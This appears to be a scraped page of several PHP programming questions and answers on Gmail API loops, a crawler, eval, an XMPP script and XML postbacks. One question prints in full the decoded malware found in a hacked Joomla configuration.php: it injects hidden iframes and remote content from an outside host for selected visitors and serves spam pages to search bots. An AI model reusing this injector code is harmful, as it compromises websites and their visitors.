I have a web application where I look through all mails in the inbox of my Gmail-account and search for specific strings to pick out different emails.
On this app I can set a limit on how many emails to search. If I set this limit to "200" or lower it works just fine most of the times.
But if i increase the limit to 400 and up that, 99% of the times, the application/page stops loading. And the code doesn't finish.
I have enabled so PHP shows error messages via the host website and also via this code at the begining of each php page:
<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');
?>
However, when the page stops loading, no error messages is displayed. (And it does display on other errors)
This is the code I'm using, together with Gmail API.
<?php
//Authentication with Gmail API happens here
$gmail = new Google_Service_Gmail($client);
$number_of_emails_to_fetch = 500;
$list = $gmail->users_messages->listUsersMessages('me', ['maxResults' => $number_of_emails_to_fetch]);
$filename = "unsubscribe-show-all.php";
$sql_table_name = create_table();
$connection = open_connection();
while ($list->getMessages() != null) {
foreach ($list->getMessages() as $mlist) {
$message_id = $mlist->id;
$optParamsGet2['format'] = 'full';
$single_message = $gmail->users_messages->get('me', $message_id, $optParamsGet2);
$payload = $single_message->getPayload();
$parts = $payload->getParts();
// With no attachment, the payload might be directly in the body, encoded.
$body = $payload->getBody();
$FOUND_BODY = FALSE;
// If we didn't find a body, let's look for the parts
if(!$FOUND_BODY) {
foreach ($parts as $part) {
if($part['parts'] && !$FOUND_BODY) {
foreach ($part['parts'] as $p) {
if($p['parts'] && count($p['parts']) > 0){
foreach ($p['parts'] as $y) {
if(($y['mimeType'] === 'text/html') && $y['body']) {
$FOUND_BODY = decodeBody($y['body']->data);
break;
}
}
} else if(($p['mimeType'] === 'text/html') && $p['body']) {
$FOUND_BODY = decodeBody($p['body']->data);
break;
}
}
}
if($FOUND_BODY) {
break;
}
}
}
// If we didn't find the body in the last parts,
// let's loop for the first parts (text-html only)
if(!$FOUND_BODY) {
foreach ($parts as $part) {
if($part['body'] && $part['mimeType'] === 'text/html') {
$FOUND_BODY = decodeBody($part['body']->data);
break;
}
}
}
// With no attachment, the payload might be directly in the body, encoded.
if(!$FOUND_BODY) {
$FOUND_BODY = decodeBody($body['data']);
}
if(!$FOUND_BODY) {
$FOUND_BODY = '(No message)';
}
}
?>
After this code I have more code that handles inserting different links into databases followed by a redirection.
However, i tried removing that code and only running the code above + the redirection, but the page still stops loading, so I figure it has something to do with this snippet.
Any advice on where to read, or hints on how to fix this would be greatly appreciated!
Related
I have limited the crawl to a single website. I have also tried to use function linkExists to stop crawling existing links, but the script doesn't stop till it times out. How can I fix that?
I am quite happy to stop the script at a fixed number of loops.
I have been doing a course online on building a search engine and have made a few changes to the original script because I found it to be a little inefficient, yet the main problem still occurs.
There is a problem withing Function linkExists that I am also trying to solve. The original script uses linkExists at the point of inputting to the database and I want to exclude it before crawling.
function LinkExists($url) {
global $con;
$query = $con->prepare("SELECT url FROM sites WHERE url = :url");
$query->bindParam(":url",$url);
$query->execute();
$indata = $query->fetch_Column("url");
}
return $query->rowCount() != 0;
}
function followLinks($url) {
global $alreadyCrawled;
global $crawling;
global $hosta;
global $indata;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link) {
$href = $link->getAttribute("href");
if((substr($href, 0, 3) !== "../") AND (strpos($href, $hosta) === false)) {
continue;
}
else if(strpos($href, "#") !== false) {
continue;
}
else if(substr($href, 0, 11) == "javascript:") {
continue;
}
if(LinkExists($indata) !== "") {
$alreadyCrawled[] = array_merge($indata, $alreadyCrawled);
}
$href = createLink($href, $url);
if(!in_array($href, $alreadyCrawled)) {
$alreadyCrawled[] = $href;
$crawling[] = $href;
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site) {
followLinks($site);
}
I'm looking for a way to include or require the content of a variable, instead of a file.
Normally, one can require/include a php function file with either of these:
require_once('my1stphpfunctionfile.php')
include('my2ndphpfunctionfile.php');
Suppose I wanted to do something like this:
$contentOf1stFFile = file_get_contents('/tmp/my1stphpfunctionfile.php');
$contentOf2ndFFile = file_get_contents('/tmp/my2ndphpfunctionfile.php');
require_once($contentOf1stFFile);
require_once($contentOf2ndFFile);
Now, in the above example, I have the actual function files which I am loading into variables. In the real world scenario I'm actually dealing with, the php code in the function files are not stored in files. They're in variables. So I'm looking for a way to treat those variables as include/require treats the function files.
I'm new to php so please forgive these questions if you find them foolish. What I'm attempting to do here does not appear to be possible. What I ended up doing was using eval which I'm told is very dangerous and should be avoided:
eval("?>$contentOf1stFFile");
eval("?>$contentOf2ndFFile");
Content of $contentOf1stFFile:
# class_lookup.php
<?php
class Lookup_whois {
// Domain name which we want to lookup
var $domain;
// TLD for above domain, eg. 'com', 'net', etc...
var $tld;
// Array which contains information needed to parse the whois server response
var $tld_params;
// Sets to error code if something fails
var $error_code;
// Sets user-friendly error message if something goes wrong
var $error_message;
// For internal use mainly - raw response from the whois server
var $whois_raw_output;
function Lookup_whois($domain, $tld, $tld_params) {
$this->domain = $domain;
$this->tld = $tld;
$this->tld_params = $tld_params;
}
function check_domain_spelling() {
if (preg_match("/^([A-Za-z0-9]+(\-?[A-za-z0-9]*)){2,63}$/", $this->domain)) {
return true;
} else {
return false;
}
}
function get_whois_output() {
if (isset($this->tld_params[$this->tld]['parameter'])) {
$query = $this->tld_params[$this->tld]['parameter'].$this->domain.'.'.$this->tld;
} else {
$query = $this->domain.'.'.$this->tld;
}
$server = $this->tld_params[$this->tld]['whois'];
if (!$this->check_domain_spelling()) {
$this->error_message = 'Domain name is not correct, check spelling. Only numbers, letters and hyphens are allowed';
return false;
}
if (!$server) {
$this->error_message = 'Whois server name is empty, please check the config file';
return false;
}
$output = array();
$fp = fsockopen($server, 43, $errno, $errstr, 30);
if(!$fp) {
$this->error_code = $errno;
$this->error_message = $errstr;
fclose($fp);
return false;
} else {
sleep(2);
fputs($fp, $query . "\n");
while(!feof($fp)) {
$output[] = fgets($fp, 128);
}
fclose($fp);
$this->whois_raw_output = $output;
return true;
}
}
function parse_whois_data() {
if (!is_array($this->whois_raw_output) && Count($this->whois_raw_output) < 1) {
$this->error_message = 'No output to parse... Get data first';
return false;
}
$wait_for = 0;
$result = array();
$result['domain'] = $this->domain.'.'.$this->tld;
foreach ($this->whois_raw_output as $line) {
#if (ereg($this->tld_params[$this->tld]['wait_for'], $line)) {
if (preg_match($this->tld_params[$this->tld]['wait_for'],$line)) {
$wait_for = 1;
}
if ($wait_for == 1) {
foreach ($this->tld_params[$this->tld]['info'] as $key => $value) {
$regs = '';
if (ereg($value.'(.*)', $line, $regs)) {
if (key_exists($key, $result)) {
if (!is_array($result[$key])) {
$result[$key] = array($result[$key]);
}
$result[$key][] = trim($regs[1]);
} else {
$result[$key] = trim($regs[1]);
$i = 1;
}
}
}
}
}
return $result;
}
}
?>
Are there any other alternatives?
No there are no other alternatives.
In terms of security there is no difference if you include() a file or eval() the content. It depends on the context. As long as you only run your own code there is nothing "dangerous".
Since a week i was trying to login to the back-end of my joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file it appeared as a string encoded with following pattern:
<?php eval(base64_decode('string here';))) />
When i decoded it using an online service this is what it appears to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js'; $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js'; $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } } //---------}
I checked other Joomla installations on my hosting space and see that all the configuration.php are the same.
What to do?
Please help
The only thing the the configuration.php file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
UPDATE:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:
http://pastebin.com/gWWtCAJR
Let me know how it goes :)
Hell all, I have a jabber script that automatically load up all msgs for me into a mysql database... however, after it's done, the script still stays/sticks... how can I have it exit after one run? Please help, and any kind of help I can get on this, I would be very very thankful!
<?php
// activate full error reporting
//error_reporting(E_ALL & E_STRICT);
include 'XMPPHP/XMPP.php';
$conn = new XMPPHP_XMPP('talk.google.com', 5222, 'username', 'password', 'xmpphp', 'gmail.com', $printlog=true, $loglevel=XMPPHP_Log::LEVEL_INFO);
// $conn->autoSubscribe();
$vcard_request = array();
try {
$conn->connect();
while(!$conn->isDisconnected()) {
$payloads = $conn->processUntil(array('message', 'presence', 'end_stream', 'session_start'));
foreach($payloads as $event) {
$pl = $event[1];
switch($event[0]) {
case 'message':
print "---------------------------------------------------------------------------------\n";
print "Message from: {$pl['from']}\n";
if($pl['subject']) print "Subject: {$pl['subject']}\n";
print $pl['body'] . "\n";
print "---------------------------------------------------------------------------------\n";
// $conn->message($pl['from'], $body="Thanks for sending me \"{$pl['body']}\".", $type=$pl['type']);
$cmd = explode(' ', $pl['body']);
if($cmd[0] == 'quit') $conn->disconnect();
if($cmd[0] == 'break') $conn->send("</end>");
if($cmd[0] == 'vcard') {
if(!($cmd[1])) $cmd[1] = $conn->user . '#' . $conn->server;
// take a note which user requested which vcard
$vcard_request[$pl['from']] = $cmd[1];
// request the vcard
$conn->getVCard($cmd[1]);
}
break;
case 'presence':
print "Presence: {$pl['from']} [{$pl['show']}] {$pl['status']}\n";
break;
case 'session_start':
print "Session Start\n";
$conn->getRoster();
$conn->presence($status="Cheese!");
break;
case 'vcard':
// check to see who requested this vcard
$deliver = array_keys($vcard_request, $pl['from']);
// work through the array to generate a message
print_r($pl);
$msg = '';
foreach($pl as $key => $item) {
$msg .= "$key: ";
if(is_array($item)) {
$msg .= "\n";
foreach($item as $subkey => $subitem) {
$msg .= " $subkey: $subitem\n";
}
} else {
$msg .= "$item\n";
}
}
// deliver the vcard msg to everyone that requested that vcard
foreach($deliver as $sendjid) {
// remove the note on requests as we send out the message
unset($vcard_request[$sendjid]);
$conn->message($sendjid, $msg, 'chat');
}
break;
}
}
}
} catch(XMPPHP_Exception $e) {
die($e->getMessage());
}
?>
Remove while condition and try.
I think it will work.
Than use any flag variable and add it in while loop.
I suggest you two ways:
1- Using "set_time_limit" function that kills script after specified seconds and throws an error.
2- Define a variable before while loop and save time in that:
$time=time();
At the end of the while loop add this code:
if($time+TimeInSeconds<time()) exit();
These two ways can stop the script after some seconds.
I hope it will help.
I have a script that is designed to parse XML postbacks from Ultracart, right now just dumps it into a MySQL table. The script works fine if I point it to a XML file on my localhost but using 'php://input' it doesn't seem to grabbing anything. My logs show apache returning 200 after the post so I have no idea what could be wrong or how to drill down the issue.. here's the code:
$doc = new DOMDocument();
$doc->loadXML($page);
$handle = fopen("test2/".time().".xml", "w+");
fwrite($handle,trim($page)); // it doesn't save this either :'(
fclose();
require_once('includes/database.php');
$db = new Database('localhost', 'user', 'password', 'db_name');
$data = array();
$exports = $doc->getElementsByTagName("export");
foreach ($exports as $export) {
$orders = $export->getElementsByTagName("order");
foreach($orders as $order) {
$data['order_id'] = $order->getElementsByTagName("order_id")->item(0)->nodeValue;
$data['payment_status'] = $order->getElementsByTagName("payment_status")->item(0)->nodeValue;
$date_array = explode(" ",$order->getElementsByTagName("payment_date_time")->item(0)->nodeValue);
if ($date_array[1] == 'JAN') { $date_array[1] = '01'; }
if ($date_array[1] == 'FEB') { $date_array[1] = '02'; }
if ($date_array[1] == 'MAR') { $date_array[1] = '03'; }
if ($date_array[1] == 'APR') { $date_array[1] = '04'; }
if ($date_array[1] == 'MAY') { $date_array[1] = '05'; } // converts Ultracart date to
if ($date_array[1] == 'JUN') { $date_array[1] = '06'; } // MySQL date
if ($date_array[1] == 'JUL') { $date_array[1] = '07'; }
if ($date_array[1] == 'AUG') { $date_array[1] = '08'; }
if ($date_array[1] == 'SEP') { $date_array[1] = '09'; }
if ($date_array[1] == 'OCT') { $date_array[1] = '10'; }
if ($date_array[1] == 'NOV') { $date_array[1] = '11'; }
if ($date_array[1] == 'DEC') { $date_array[1] = '12'; }
$data['payment_date'] = $date_array[2]."-".$date_array[1]."-".$date_array[0];
$data['payment_time'] = $date_array[3];
//... we'll skip this, there are 80 some elements
$data['discount'] = $order->getElementsByTagName("discount")->item(0)->nodeValue;
$data['distribution_center_code'] = $order->getElementsByTagName("distribution_center_code")->item(0)->nodeValue;
}
}
}
$db->insert('order_history',$data);
} else die('ERROR: Token Check Failed!');
Without seeing the code above that point, I'd suggest that you dump the output straight out and see if you're actually receiving the XML. I doubt the problem is with your parsing, but with receiving the postback. Looking at the ultracart documentation, it looks to me like they aren't passing the the body of the xml in as a post parameter, but probably as an HTTP PUT which is fairly whacky.
http://php.net/manual/en/features.file-upload.put-method.php
I'd wager on most shared hosting etc, PUT support is pretty limited or not supported by default. I'd look there first.
Josh
The script works fine if I point it to a XML file on my localhost but using 'php://input' it doesn't seem to grabbing anything.
Why would you expect php://input to "grab anything"? You can use php://input only to read from the standard input if PHP is being run from the command line or to fetch the request data (e.g. POST or PUT HTTP request data), except for a multipart POST.